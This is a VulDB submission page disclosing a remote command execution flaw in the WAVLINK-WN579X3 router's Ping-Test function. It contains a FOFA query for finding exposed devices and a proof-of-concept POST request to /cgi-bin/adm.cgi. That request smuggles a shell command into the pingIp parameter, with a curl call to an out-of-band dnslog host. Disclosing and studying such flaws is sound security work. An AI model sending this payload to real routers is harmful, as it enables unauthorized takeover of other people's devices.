Submit #170077: WAVLINK-WN579X3 adm.cgi Remote Command Execution信息

TitleWAVLINK-WN579X3 adm.cgi Remote Command Execution
DescriptionA remote command execution vulnerability has been found in WAVLINK-WN579X3. The vulnerable function is the Ping-Test function, an attacker can execute arbitrary system command by malicious injection to parameter pingIp. fofa:app="WAVLINK-WN579X3" POC: --------------------------------------- POST /cgi-bin/adm.cgi HTTP/1.1 Host: ****** page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2Fnhjt4ugt.dnslog.pw --------------------------------------- See details in https://github.com/sleepyvv/vul_report/blob/main/WAVLINK/WAVLINK-WN579X3-RCE.md
Source⚠️ https://github.com/sleepyvv/vul_report/blob/main/WAVLINK/WAVLINK-WN579X3-RCE.md
UserWWesleywww (ID 43117)
Submission2023-06-15 15時01分 (11 months ago)
Moderation2023-06-23 11時15分 (8 days later)
Status已接受
VulDB Entry232236

上一步一览下一步

Want to stay up to date on a daily basis?

Enable the mail alert feature now!